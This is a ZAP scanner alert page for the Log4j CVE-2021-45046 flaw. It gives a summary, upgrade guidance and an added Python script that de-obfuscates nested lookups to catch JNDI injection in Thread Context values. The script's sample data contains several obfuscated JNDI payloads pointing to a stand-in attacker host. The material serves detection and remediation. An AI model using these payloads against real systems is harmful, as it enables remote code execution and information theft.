Details | |
---|---|
Alert ID | 40043-2 |
Alert Type | Active |
Status | release |
Risk | High |
CWE | 117 |
WASC | 20 |
Technologies Targeted | Language / Java |
Tags | CVE-2021-45046 CWE-117 HIPAA OUT_OF_BAND OWASP_2017_A09 OWASP_2021_A06 PCI_DSS POLICY_PENTEST POLICY_QA_FULL WSTG-V42-INPV-11 |
More Info | Scan Rule Help |
Summary
The fix for CVE-2021-44228 that shipped in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc or %MDC), an attacker who controls Thread Context Map (MDC) input data can craft malicious input using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments, and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) address this by removing support for message lookup patterns and disabling JNDI functionality by default.
Solution
Upgrade Log4j2 to version 2.17.1 or newer (2.12.4 for Java 7 and 2.3.2 for Java 6 are the corresponding releases for older runtimes). Staying on 2.15.0, or relying on the earlier mitigation of setting log4j2.formatMsgNoLookups / LOG4J_FORMAT_MSG_NO_LOOKUPS to true, does not close this issue: that setting only disables lookups in the log message, while the lookup here is evaluated by the Pattern Layout.
Other Info
This is an active scan rule tagged OUT_OF_BAND: it injects JNDI lookup payloads into the request and raises the alert when the scanner's out-of-band (OAST) callback service is contacted, rather than by inspecting the HTTP response alone, so an OAST service must be available for the rule to report findings.
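As an added example (not part of ZAP and not Log4j code), the following Python screens attacker-influenced values before an application copies them into the Thread Context Map, which is exactly the input CVE-2021-45046 concerns. It unwraps the nested `${...}` lookups attackers use to hide `${jndi:...}` from naive string matching. The unwrapping is a deliberately simplified model of Log4j 2's substitution: only nesting, the `:-` default-value syntax and the `lower:`/`upper:` lookups are reproduced, and every other lookup is left in place. The sample context values are constructed. This is a detection aid for logs, WAF rules or pre-logging input checks; the fix remains upgrading Log4j.

```python
import re

# One innermost lookup: "${" + body + "}" where body contains no further "${" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once obfuscation has been stripped (lookup names are case-insensitive).
JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)


def resolve_lookup(body):
    """Evaluate one lookup body as an attacker's obfuscation expects Log4j to.

    Simplified model (assumption): only the ':-' default-value syntax and the
    lower:/upper: lookups are evaluated. Returns the replacement text, or None
    when the lookup must stay in place: a jndi: lookup (which we want to keep
    visible) or a lookup this model does not evaluate (env:, sys:, date:, ...).
    """
    has_default = ":-" in body
    var, _, default = body.partition(":-")
    name, sep, arg = var.partition(":")
    name = name.strip().lower()
    if name == "jndi":
        return None
    if sep and name == "lower":
        value = arg.lower()
    elif sep and name == "upper":
        value = arg.upper()
    else:
        value = None
    if value is None and has_default:
        # "${::-j}" and "${env:NaN:-j}" both fall through to their default, "j"
        return default
    return value


def normalize(text, max_passes=32):
    """Rewrite nested lookups innermost-first until nothing changes.

    "${${lower:J}ndi:${lower:L}dap://x}" becomes "${jndi:ldap://x}".
    """
    for _ in range(max_passes):
        out, pos, changed = [], 0, False
        for m in INNERMOST.finditer(text):
            replacement = resolve_lookup(m.group(1))
            if replacement is None:
                continue
            out.append(text[pos:m.start()])
            out.append(replacement)
            pos = m.end()
            changed = True
        if not changed:
            break
        out.append(text[pos:])
        text = "".join(out)
    return text


def find_jndi_lookups(text):
    """Return every JNDI lookup present in text after de-obfuscation."""
    return JNDI.findall(normalize(text))


def screen_context_values(values):
    """values maps a Thread Context key to the attacker-influenced string the
    application is about to put there. Returns {key: [payloads]} for the
    values that carry a JNDI lookup; an empty dict means nothing was found."""
    flagged = {}
    for key, value in values.items():
        hits = find_jndi_lookups(value)
        if hits:
            flagged[key] = hits
    return flagged


# Constructed sample: header and parameter values a web application might copy
# into the Thread Context Map (e.g. ThreadContext.put("loginId", ...)).
SAMPLE_CONTEXT_VALUES = {
    "loginId": "alice",
    "userAgent": "Mozilla/5.0 ${jndi:ldap://attacker.example/a}",
    "clientIp": "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/b}",
    "apiVersion": "${${lower:J}ndi:${lower:L}dap://attacker.example/c}",
    "referer": "${env:HOME}/docs",
}

if __name__ == "__main__":
    for key, payloads in screen_context_values(SAMPLE_CONTEXT_VALUES).items():
        print(f"{key}: {payloads}")
```

Running the block flags userAgent, clientIp and apiVersion and leaves loginId and referer alone; the unresolved `${env:HOME}` is kept verbatim so that a stricter policy could still reject any remaining lookup syntax. Because Log4j matches lookup prefixes case-insensitively, the final match is case-insensitive too.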
References
- https://github.com/lunasec-io/lunasec/blob/c6bb0762b4ce308768baca72c7e34415402e9647/docs/blog/2021-12-09-log4j-zero-day.mdx
- https://nvd.nist.gov/vuln/detail/CVE-2021-45046